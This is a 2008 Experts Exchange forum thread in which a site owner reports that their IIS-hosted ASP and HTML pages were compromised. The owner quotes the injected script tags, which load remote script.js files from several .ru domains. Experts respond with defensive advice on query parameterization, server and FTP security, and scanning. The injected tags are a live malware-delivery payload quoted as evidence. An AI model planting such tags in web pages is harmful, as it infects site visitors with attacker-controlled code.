Solved

regarding IIS server hack

Posted on 2008-10-29
4
590 Views
Last Modified: 2013-12-04
Hi,

We have Verio/Ntt Windows shared Hosting Plans and we configure our imp. client on their, this is Global client website, this way some of hackers always try to hack this website, this website also connect with SQL server 2005 database,
But presently hacker are able to hack the static and dynamic pages (.asp and .html), We have found that the following script in our web pages,
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<script src=http://www.lang42.ru/script.js></script><script src=http://www.errghr.ru/script.js></script>
<script src=http://www.berjke.ru/script.js></script>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
I got the following links which is related   the website hack issue
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Kindly let me know how I can check my whole website and also sql server to know that how hacker hack our website and also how I can secure our server

Regards,
Naresh
0
Comment
Question by:sitg
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
4 Comments
 
LVL 32

Expert Comment

by:Daniel Wilson
ID: 22831130
If they changed static pages, it's not JUST a SQL injection.

Did stuff in the database change?  Or just your pages?

If stuff in the DB changed, suspect a SQL injection.  The classic method for hardening against that attack is parameterization of all queries that accept user input.  

e.g. sql = "Select * from Users where Username = '" + Request("Username") + "' "
becomes
sql = "Select * from Users where Username = @UserName"
command.parameters.add ("@userName", Request("Username"))

For the non-SQL-Injection hack ... look at IIS security.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839639
DanielWilson is right in my opinion; the physical attack/change of the html files does indicate a server/ftp (or possible cms-system admin) security problem rather than just a simple data vulnerability problem.

However, you might have both (physical attacks on the files, and injections/xss to the data)

For data:
Take a look at:
http://www.sqlinjectionscanner.com/

They've got a free data scanner; you can use that to double-check if there's any injected data hanging around in the database.

Securing your code/database is obviously a good idea, but hackers will almost always find any vulnerabilities you might have, so it's a good idea to have a reliable full-scan tool available which is dedicated to the task of checking against injected data/xss attacks in the data.

ie click on the download free version of the "ASP SQL Injection Scanner Tool"

I think the physical attack on the files is more pressing than a potential data injection though, because if they can physically change your files then you need to get that aspect secured first. eg change all your helm/ftp pwds, and look into the logfiles to see if people are using, say, your own cms admin system (if you have one) to effect the files.

Usually a physical attack like this would be due to a server managing to somehow get onto the server, you might need to totally reformat the server in order to find it because some viruses are buried so deeply that anti-virus software can't find them.

So, I'd say, change all your pwds, look into the logfiles, and check with the host to see if a virus is actually on the server itself.
0
 
LVL 2

Expert Comment

by:devshb
ID: 22839648
"Usually a physical attack like this would be due to a server managing to somehow get onto the server"

I meant:

"Usually a physical attack like this would be due to a *virus* managing to somehow get onto the server"

(sorry)
0
 

Accepted Solution

by:
sitg earned 0 total points
ID: 23053650
I have run the Acunetix Web Vulnerability Scanner and resolve this issue,
lots of web pages having sql injection issue.

Regards,
Naresh
0

Featured Post

PeopleSoft Has Never Been Easier

PeopleSoft Adoption Made Smooth & Simple!

On-The-Job Training Is made Intuitive & Easy With WalkMe's On-Screen Guidance Tool.  Claim Your Free WalkMe Account Now

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

No security measures warrant 100% as a "silver bullet". The truth is we also cannot assume anything but a defensive and vigilance posture. Adopt no trust by default and reveal in assumption. Only assume anonymity or invisibility in the reverse. Safe…
Users of Windows 10 Professional can disable automatic reboots using the policy editor. This tool is not included in the Windows home edition. But don't worry! Follow the instructions below to install (a Win7) policy editor on your Windows 10 Home e…
In this video, viewers will be given step by step instructions on adjusting mouse, pointer and cursor visibility in Microsoft Windows 10. The video seeks to educate those who are struggling with the new Windows 10 Graphical User Interface. Change Cu…
Add bar graphs to Access queries using Unicode block characters. Graphs appear on every record in the color you want. Give life to numbers. Hopes this gives you ideas on visualizing your data in new ways ~ Create a calculated field in a query: …

688 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question